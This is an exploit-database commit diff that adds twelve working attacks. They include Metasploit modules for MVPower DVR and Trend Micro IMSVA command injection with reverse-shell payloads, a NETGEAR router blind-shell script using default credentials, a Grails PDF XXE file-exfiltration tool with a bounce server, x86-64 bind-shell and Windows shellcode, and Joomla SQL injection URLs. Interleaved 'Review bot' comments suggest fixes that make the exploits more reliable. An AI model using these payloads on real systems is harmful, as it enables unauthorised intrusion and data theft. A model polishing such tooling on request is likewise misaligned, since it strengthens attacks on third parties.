DB: 2017-02-28
12 new exploits MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit) Windows x86 - Executable Directory Search Shellcode (130 bytes) Linux/x86_64 - Random Listener Shellcode (54 bytes) NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit) Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection Joomla! Component My MSG 3.2.1 - SQL Injection Joomla! Component Spinner 360 1.3.0 - SQL Injection Joomla! Component JomSocial - SQL Injection Grails PDF Plugin 0.6 - XML External Entity Injection Joomla! Component OneVote! 1.0 - SQL Injection
parent
3f1035a488
commit
026ded7298
13 changed files with 712 additions and 0 deletions
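--- a/files.csv
+++ b/files.csv
@@ -15300,6 +15300,7 @@ id,file,description,date,author,platform,type,port
 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0
 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0
 41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0
+41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -15917,6 +15918,8 @@ id,file,description,date,author,platform,type,port
 41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
+41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
+41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37375,3 +37378,12 @@ id,file,description,date,author,platform,type,port
 41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0
 41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0
 41456,platforms/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41459,platforms/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,hardware,webapps,0
+41460,platforms/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41461,platforms/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",multiple,webapps,0
+41462,platforms/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41463,platforms/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41464,platforms/php/webapps/41464.txt,"Joomla! Component Spinner 360 1.3.0 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41465,platforms/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
+41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
+41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0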
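--- a/platforms/arm/remote/41471.rb
+++ b/platforms/arm/remote/41471.rb
@@ -0,0 +1,97 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::CmdStager
+
+HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] }
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'MVPower DVR Shell Unauthenticated Command Execution',
+'Description' => %q{
+This module exploits an unauthenticated remote command execution
+vulnerability in MVPower digital video recorders. The 'shell' file
+on the web interface executes arbitrary operating system commands in
+the query string.
+
+This module was tested successfully on a MVPower model TV-7104HE with
+firmware version 1.8.4 115215B9 (Build 2014/11/17).
+
+The TV-7108HE model is also reportedly affected, but untested.
+},
+'Author' =>
+[
+'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC
+'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC
+'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+],
+'License' => MSF_LICENSE,
+'Platform' => 'linux',
+'References' =>
+[
+# Comment from Paul Davies contains probably the first published PoC
+[ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ],
+# Writeup with PoC by Andrew Tierney from Pen Test Partners
+[ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ]
+],
+'DisclosureDate' => 'Aug 23 2015',
+'Privileged' => true, # BusyBox
+'Arch' => ARCH_ARMLE,
+'DefaultOptions' =>
+{
+'PAYLOAD' => 'linux/armle/mettle_reverse_tcp',
+'CMDSTAGER::FLAVOR' => 'wget'
+},
+'Targets' =>
+[
+['Automatic', {}]
+],
+'CmdStagerFlavor' => %w{ echo printf wget },
+'DefaultTarget' => 0))
+end
+
+def check
+begin
+fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6)
+res = send_request_cgi(
+'uri' => "/shell?echo+#{fingerprint}",
+'headers' => { 'Connection' => 'Keep-Alive' }
+)
+if res && res.body.include?(fingerprint)
+return CheckCode::Vulnerable
+end
+rescue ::Rex::ConnectionError
+return CheckCode::Unknown
+end
+CheckCode::Safe
+end
+
+def execute_command(cmd, opts)
+begin
+send_request_cgi(
+'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}",
+'headers' => { 'Connection' => 'Keep-Alive' }
+)
+rescue ::Rex::ConnectionError
+fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+end
+end
+
+def exploit
+print_status("#{peer} - Connecting to target")
+
+unless check == CheckCode::Vulnerable
+fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable")
+end
+
+print_good("#{peer} - Target is vulnerable!")
+
+execute_cmdstager(linemax: 1500)
+end
+end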
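Review bot: `execute_command(cmd, opts)` carries no comment explaining that it is the per-line callback the `Msf::Exploit::CmdStager` mixin invokes (presumably the reason `opts` is accepted yet unused), so a later cleanup could drop the parameter and break the mixin contract; a one-liner such as `# CmdStager callback: issues one request per stager chunk; opts is required by the mixin interface and unused here` would prevent that. The `'headers' => { 'Connection' => 'Keep-Alive' }` hash is duplicated between `check` and `execute_command`; a small private helper taking the query string would keep the two requests in step. The rendered page has lost the file's indentation, so the nesting of the `begin`/`rescue` blocks is inferred from the `begin`/`end` pairs rather than seen.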
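--- a/platforms/hardware/webapps/41459.py
+++ b/platforms/hardware/webapps/41459.py
@@ -0,0 +1,40 @@
+#!/usr/bin/python
+
+#Provides access to default user account, privileges can be easily elevated by using either:
+# - a kernel exploit (ex. memodipper was tested and it worked)
+# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
+# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)
+
+#Pozdrawiam: Kornela, Komara i Sknerusa
+
+import sys
+import requests
+
+#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
+#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
+
+login = 'admin'
+password = 'password'
+
+def main():
+if len(sys.argv) < 2:
+print "./netgearpwn_2.py <router ip>"
+return
+spawnShell()
+
+def execute(cmd): #Escaping basic sanitization
+requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password))
+return
+
+def spawnShell():
+print "Dropping a shell-like environment (blind OS injection)"
+print "To test it type 'reboot'"
+while True:
+cmd = raw_input("[blind $] ")
+execute(cmd)
+
+if __name__ == "__main__":
+main()
+
+#2017-02-25 by SivertPL
+#Tak, to ja.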
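Review bot: `execute()` discards the value returned by `requests.post`, so a 401 from rejected `login`/`password` credentials is never reported and the `[blind $]` loop keeps prompting as if every command had been delivered; keeping the response and checking `r.status_code` (or calling `r.raise_for_status()`) would make that failure visible. The script is Python 2 only (`print` statements, `raw_input`) while the shebang is the bare `#!/usr/bin/python`; a header comment such as `# Requires Python 2` would save the next reader a SyntaxError under Python 3. The indentation of `main`, `execute` and `spawnShell` is not preserved in this rendering, so block structure is inferred from the `def` lines.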
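--- a/platforms/java/webapps/41466.py
+++ b/platforms/java/webapps/41466.py
@@ -0,0 +1,140 @@
+# Exploit Title: Grails PDF Plugin 0.6 XXE
+# Date: 21/02/2017
+# Vendor Homepage: http://www.grails.org/plugin/pdf
+# Software Link: https://github.com/aeischeid/grails-pdfplugin
+# Exploit Author: Charles FOL
+# Contact: https://twitter.com/ambionics
+# Website: https://www.ambionics.io/blog/grails-pdf-plugin-xxe
+# Version: 0.6
+# CVE : N/A
+
+
+1. dump_file.py
+
+#!/usr/bin/python3
+# Grails PDF Plugin XXE
+# cf
+# https://www.ambionics.io/blog/grails-pdf-plugin-xxe
+
+import requests
+import sys
+import os
+
+# Base URL of the Grails target
+URL = 'http://10.0.0.179:8080/grailstest'
+# "Bounce" HTTP Server
+BOUNCE = 'http://10.0.0.138:7777/'
+
+
+session = requests.Session()
+pdfForm = '/pdf/pdfForm?url='
+renderPage = 'render.html'
+
+if len(sys.argv) < 0:
+print('usage: ./%s <resource>' % sys.argv[0])
+print('e.g.: ./%s file:///etc/passwd' % sys.argv[0])
+exit(0)
+
+resource = sys.argv[1]
+
+# Build the full URL
+full_url = URL + pdfForm + pdfForm + BOUNCE + renderPage
+full_url += '&resource=' + sys.argv[1]
+
+r = requests.get(full_url, allow_redirects=False)
+
+#print(full_url)
+
+if r.status_code != 200:
+print('Error: %s' % r)
+else:
+with open('/tmp/file.pdf', 'wb') as handle:
+handle.write(r.content)
+os.system('pdftotext /tmp/file.pdf')
+with open('/tmp/file.txt', 'r') as handle:
+print(handle.read(), end='')
+
+
+2. server.py
+
+#!/usr/bin/python3
+# Grails PDF Plugin XXE
+# cf
+# https://www.ambionics.io/blog/grails-pdf-plugin-xxe
+#
+# Server part of the exploitation
+#
+# Start it in an empty folder:
+# $ mkdir /tmp/empty
+# $ mv server.py /tmp/empty
+# $ /tmp/empty/server.py
+
+import http.server
+import socketserver
+import sys
+
+
+BOUNCE_IP = '10.0.0.138'
+BOUNCE_PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 80
+
+# Template for the HTML page
+template = """<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE html [
+<!ENTITY % start "<![CDATA[">
+<!ENTITY % goodies SYSTEM "[RESOURCE]">
+<!ENTITY % end "]]>">
+<!ENTITY % dtd SYSTEM "http://[BOUNCE]/out.dtd">
+%dtd;
+]>
+<html>
+<head>
+<style>
+body { font-size: 1px; width: 1000000000px;}
+</style>
+</head>
+<body>
+<pre>&all;</pre>
+</body>
+</html>"""
+
+# The external DTD trick allows us to get more files; they would've been
+invalid
+# otherwise
+# See: https://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
+dtd = """<?xml version="1.0" encoding="UTF-8"?>
+<!ENTITY all "%start;%goodies;%end;">
+"""
+
+# Really hacky. When the render.html page is requested, we extract the
+# 'resource=XXX' part of the URL and create an HTML file which XXEs it.
+class GetHandler(http.server.SimpleHTTPRequestHandler):
+def do_GET(self):
+if 'render.html' in self.path:
+resource = self.path.split('resource=')[1]
+print('Resource: %s' % resource)
+page = template
+page = page.replace('[RESOURCE]', resource)
+page = page.replace('[BOUNCE]', '%s:%d' % (BOUNCE_IP,
+BOUNCE_PORT))
+
+with open('render.html', 'w') as handle:
+handle.write(page)
+
+return super().do_GET()
+
+
+Handler = GetHandler
+httpd = socketserver.TCPServer(("", BOUNCE_PORT), Handler)
+
+with open('out.dtd', 'w') as handle:
+handle.write(dtd)
+
+print("Started HTTP server on port %d, press Ctrl-C to exit..." %
+BOUNCE_PORT)
+try:
+httpd.serve_forever()
+except KeyboardInterrupt:
+print("Keyboard interrupt received, exiting.")
+httpd.server_close()
+
+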
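Review bot: In dump_file.py the usage guard `if len(sys.argv) < 0:` can never be true, so running the script without an argument fails at `resource = sys.argv[1]` with an IndexError instead of printing the usage; it should read `if len(sys.argv) < 2:`. The output goes to the fixed paths `/tmp/file.pdf` and `/tmp/file.txt` and through `os.system('pdftotext /tmp/file.pdf')`; predictable names in a world-writable directory can be pre-created or symlinked by another local user, so `tempfile.mkstemp()` plus `subprocess.run(['pdftotext', path])` is the safer shape. In server.py the wrapped comment `# The external DTD trick allows us to get more files; they would've been` is followed by a bare `invalid` line which, as rendered here, is an expression statement that would raise NameError when the module loads; it looks like a lost leading `#`. `self.path.split('resource=')[1]` in `do_GET` also raises IndexError for any `render.html` request that lacks that parameter.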
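--- a/platforms/lin_x86-64/shellcode/41468.nasm
+++ b/platforms/lin_x86-64/shellcode/41468.nasm
@@ -0,0 +1,73 @@
+;The MIT License (MIT)
+
+;Copyright (c) 2017 Robert L. Taylor
+
+;Permission is hereby granted, free of charge, to any person obtaining a
+;copy of this software and associated documentation files (the “Software”),
+;to deal in the Software without restriction, including without limitation
+;the rights to use, copy, modify, merge, publish, distribute, sublicense,
+;and/or sell copies of the Software, and to permit persons to whom the
+;Software is furnished to do so, subject to the following conditions:
+
+;The above copyright notice and this permission notice shall be included
+;in all copies or substantial portions of the Software.
+
+;The Software is provided “as is”, without warranty of any kind, express or
+;implied, including but not limited to the warranties of merchantability,
+;fitness for a particular purpose and noninfringement. In no event shall the
+;authors or copyright holders be liable for any claim, damages or other
+;liability, whether in an action of contract, tort or otherwise, arising
+;from, out of or in connection with the software or the use or other
+;dealings in the Software.
+;
+; For a detailed explanation of this shellcode see my blog post:
+; http://a41l4.blogspot.ca/2017/02/shellrandomlisten1434.html
+
+global _start
+
+section .text
+
+_start:
+; Socket
+push 41
+pop rax
+push 2
+pop rdi
+push 1
+pop rsi
+cdq
+syscall
+; Listen
+xor esi,esi
+xchg eax,edi
+mov al,50
+syscall
+; Accept
+mov al,43
+syscall
+; Dup 2
+push 3
+pop rsi
+xchg edi,eax
+dup2loop:
+push 33
+pop rax
+dec esi
+syscall
+jne dup2loop
+; Execve
+; rax and rsi and rdx are zero already
+push rax ; zero terminator for the following string that we are pushing
+
+; push /bin//sh in reverse
+mov rbx, '/bin//sh'
+push rbx
+
+; store /bin//sh address in RDI
+push rsp
+pop rdi
+
+; Call the Execve syscall
+mov al, 59
+syscall
+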
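--- a/platforms/multiple/webapps/41461.rb
+++ b/platforms/multiple/webapps/41461.rb
@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info={})
+super(update_info(info,
+'Name' => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution',
+'Description' => %q{
+This module exploits a command injection vulnerability in the Trend Micro
+IMSVA product. An authenticated user can execute a terminal command under
+the context of the web server user which is root. Besides, default installation
+of IMSVA comes with a default administrator credentials.
+saveCert.imss endpoint takes several user inputs and performs blacklisting.
+After that it use them as argument of predefined operating system command
+without proper sanitation. However,due to improper blacklisting rule it's possible to inject
+arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
+This module was tested against IMSVA 9.1-1600.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
+],
+'References' =>
+[
+['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
+],
+'Privileged' => true,
+'Payload' =>
+{
+'Space' => 1024,
+'DisableNops' => true,
+'BadChars' => "\x2f\x22"
+},
+'DefaultOptions' =>
+{
+'SSL' => true,
+'payload' => 'python/meterpreter/reverse_tcp',
+},
+'Platform' => ['python'],
+'Arch' => ARCH_PYTHON,
+'Targets' => [ ['Automatic', {}] ],
+'DisclosureDate' => 'Jan 15 2017',
+'DefaultTarget' => 0
+))
+
+register_options(
+[
+OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
+OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
+OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
+Opt::RPORT(8445)
+]
+)
+end
+
+def login
+
+user = datastore['USERNAME']
+pass = datastore['PASSWORD']
+
+print_status("Attempting to login with #{user}:#{pass}")
+
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'login.imss'),
+'vars_post' => {
+'userid' => user,
+'pwdfake' => Rex::Text::encode_base64(pass)
+}
+})
+
+if res && res.body.include?("The user name or password you entered is invalid")
+fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
+end
+
+cookie = res.get_cookies
+if res.code == 302 && cookie.include?("JSESSIONID")
+jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
+print_good("Authenticated as #{user}:#{pass}")
+return jsessionid
+end
+
+nil
+end
+
+def exploit
+
+jsessionid = login
+
+unless jsessionid
+fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
+end
+
+# Somehow java stores last visited url on session like viewstate!
+# Visit form before submitting it. Otherwise, it will cause a crash.
+
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'initCert.imss'),
+'cookie' => "JSESSIONID=#{jsessionid}"
+})
+
+if !res or !res.body.include?("Transport Layer Security")
+fail_with(Failure::Unknown, 'Unable to visit initCert.imss')
+end
+
+# Random string that will be used as a cert name, state, email etc.
+r = Rex::Text::rand_text_alphanumeric(5)
+
+print_status("Delivering payload...")
+
+# Since double quote are blacklisted, we are using Single, Backslash, Single, Single on our payload. Thanks to @wvu !!!
+res = send_request_cgi({
+'method' => 'POST',
+'uri' => normalize_uri(target_uri.path, 'saveCert.imss'),
+'cookie' => "JSESSIONID=#{jsessionid}",
+'vars_get' => {
+'mode' => 0
+},
+'vars_post' => {
+'certName' => r,
+'certType' => 0,
+'keyLength' => 2048,
+'countryCode' => 'TR',
+'state' => r,
+'locality' => r,
+'org' => r,
+'orgUnit' => r,
+'commonName' => "#{r}';python -c '#{payload.encoded.gsub("'", "'\\\\''")}' #",
+'emailAddress' => "#{r}@mail.com",
+'validDays' => '',
+'id' => '',
+}
+})
+end
+
+end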
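Review bot: In `login`, `cookie = res.get_cookies` runs with no nil check even though the line just above it (`if res && res.body.include?(...)`) acknowledges that `send_request_cgi` can return nil, so an unresponsive target ends in a NoMethodError rather than a clean failure; add `fail_with(Failure::Unreachable, "#{peer} - No response from login.imss") unless res` before it. `print_status("Attempting to login with #{user}:#{pass}")`, the `fail_with` message and `print_good("Authenticated as #{user}:#{pass}")` all write the password to the console and to any session log; logging the username alone is the usual practice. In `exploit` the result of the final `send_request_cgi` to `saveCert.imss` is assigned to `res` but never inspected, so a rejected request is indistinguishable from a delivered one.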
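--- a/platforms/php/webapps/41460.txt
+++ b/platforms/php/webapps/41460.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component Gnosis v1.1.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_gnosis
+# Date: 25.02.2017
+# Vendor Homepage: http://hypermodern.org/
+# Software : https://extensions.joomla.org/extensions/extension/directory-a-documentation/glossary/gnosis/
+# Demo: http://gnosis.hypermodern.org/index.php/dictionary
+# Version: 1.1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_gnosis&view=tags&id=[SQL]
+# # # # #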
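--- a/platforms/php/webapps/41462.txt
+++ b/platforms/php/webapps/41462.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: Joomla! Component Appointments for JomSocial v3.8.1 - SQL Injection
+# Google Dork: N/A
+# Date: 25.02.2017
+# Vendor Homepage: https://www.cmsplugin.com/
+# Software : https://www.cmsplugin.com/products/components/1-appointments-for-jomsocial
+# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-appointments/
+# Version: 3.8.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/my-appointments/viewappointment?id=[SQL]
+# http://localhost/[PATH]/my-appointments/my-appointments/edit?id=[SQL]
+# '+order+by+10-- -
+# Etc...
+# # # # #
+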
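--- a/platforms/php/webapps/41463.txt
+++ b/platforms/php/webapps/41463.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: Joomla! Component My MSG v3.2.1 - SQL Injection
+# Google Dork: N/A
+# Date: 25.02.2017
+# Vendor Homepage: https://www.cmsplugin.com/
+# Software : https://www.cmsplugin.com/products/components/10-my-msg
+# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-msg
+# Version: 3.2.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php?option=com_mymsg&layout=edit&reply_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_mymsg&view=msg&filter_box=[SQL]
+# http://localhost/[PATH]/index.php?option=com_mymsg&view=mymsg&Ihsan_Sencan=[SQL]
+# '+order+by+10-- -
+# Etc...
+# # # # #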
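--- a/platforms/php/webapps/41464.txt
+++ b/platforms/php/webapps/41464.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Joomla! Component Spinner 360 v1.3.0 - SQL Injection
+# Google Dork: N/A
+# Date: 25.02.2017
+# Vendor Homepage: https://www.cmsplugin.com/
+# Software : https://www.cmsplugin.com/products/components/13-spinner360
+# Demo: http://extensions.cmsplugin.com/extensions/j3demo/spinner-360
+# Version: 1.3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/spinner-360?Ihsan_Sencan=[SQL]
+# # # # #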
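--- a/platforms/php/webapps/41465.txt
+++ b/platforms/php/webapps/41465.txt
@@ -0,0 +1,20 @@
+# # # # #
+# Exploit Title: Joomla! Component JomSocial - SQL Injection
+# Google Dork: N/A
+# Date: 25.02.2017
+# Vendor Homepage: https://www.cmsplugin.com/
+# Software : http://extensions.cmsplugin.com/extensions/j3demo/jomsocial
+# Demo: http://extensions.cmsplugin.com/extensions/j3demo/jomsocial
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/groups/?IhsanSencan=[SQL]
+# http://localhost/[PATH]/videos/?IhsanSencan=[SQL]
+# http://localhost/[PATH]/events/?IhsanSencan=[SQL]
+# # # # #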
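--- a/platforms/php/webapps/41470.txt
+++ b/platforms/php/webapps/41470.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_onevote
+# Date: 27.02.2017
+# Vendor Homepage: http://advcomsys.com/
+# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/
+# Demo: http://advcomsys.com/index.php/joomla-demos/elections
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL]
+# +/*!50000union*/+select+@@version-- -
+# # # # #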
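--- a/platforms/win_x86/shellcode/41467.c
+++ b/platforms/win_x86/shellcode/41467.c
@@ -0,0 +1,90 @@
+# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
+# Date: 26-02-2017
+# Author: Krzysztof Przybylski
+# Platform: Win_x86
+# Tested on: WinXP SP1
+# Shellcode Size: 130 bytes
+
+/*
+Description:
+write & exec dir searcher
+starts from C:\
+If dir found then write, execute (ping 127.1.1.1) and exit
+If Write/noexec dir found then continue
+
+Tested on WinXP SP1 (77e6fd35;77e798fd)
+i686-w64-mingw32-gcc shell.c -o golddgger.exe
+
+Null-free version:
+
+(gdb) disassemble
+Dump of assembler code for function function:
+=> 0x08048062 <+0>: pop ecx
+0x08048063 <+1>: xor eax,eax
+0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al
+0x08048068 <+6>: push eax
+0x08048069 <+7>: push ecx
+0x0804806a <+8>: mov eax,0x77e6fd35
+0x0804806f <+13>: call eax
+0x08048071 <+15>: xor eax,eax
+0x08048073 <+17>: push eax
+0x08048074 <+18>: mov eax,0x77e798fd
+0x08048079 <+23>: call eax
+
+
+NULL-free shellcode (132 bytes):
+
+"\xeb\x19\x59\x31\xc0\x88\x41\x64"
+"\x50\x51\xb8"
+"\x35\xfd\xe6\x77" // exec
+"\xff\xd0\x31\xc0\x50\xb8"
+"\xfd\x98\xe7\x77" // exit
+"\xff\xd0\xe8\xe2\xff\xff\xff"
+"\x63\x6d\x64\x2e\x65\x78\x65\x20"
+"\x2f\x43\x20\x22\x28\x63\x64\x20"
+"\x63\x3a\x5c" // C:\
+"\x20\x26\x46\x4f\x52"
+"\x20\x2f\x44\x20\x2f\x72\x20\x25"
+"\x41\x20\x49\x4e\x20\x28\x2a\x29"
+"\x20\x44\x4f\x20"
+"\x65\x63\x68\x6f\x20"
+"\x70\x69\x6e\x67\x20"
+"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
+"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
+"\x61\x74\x22\x26\x28\x63\x61\x6c"
+"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
+"\x62\x61\x74\x22\x26\x26\x65\x78"
+"\x69\x74\x29\x29\x22";
+
+*/
+// NULL version (130 bytes):
+
+char code[] =
+"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
+"\x35\xfd\xe6\x77" // exec
+"\xff\xd0\x31\xc0\x50\xb8"
+"\xfd\x98\xe7\x77" // exit
+"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
+"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
+"\x43\x20\x22\x28\x63\x64\x20"
+"\x63\x3a\x5c" // C:\
+"\x20\x26\x46\x4f\x52\x20\x2f\x44"
+"\x20\x2f\x72\x20\x25\x41\x20\x49"
+"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
+"\x20\x65\x63\x68\x6f\x20\x70\x69"
+"\x6e\x67\x20"
+"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1
+"\x3e\x22\x25\x41"
+"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
+"\x28\x63\x61\x6c\x6c\x20\x22\x25"
+"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
+"\x26\x26\x65\x78\x69\x74\x29\x29"
+"\x22\x00";
+
+int main(int argc, char **argv)
+
+{
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}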
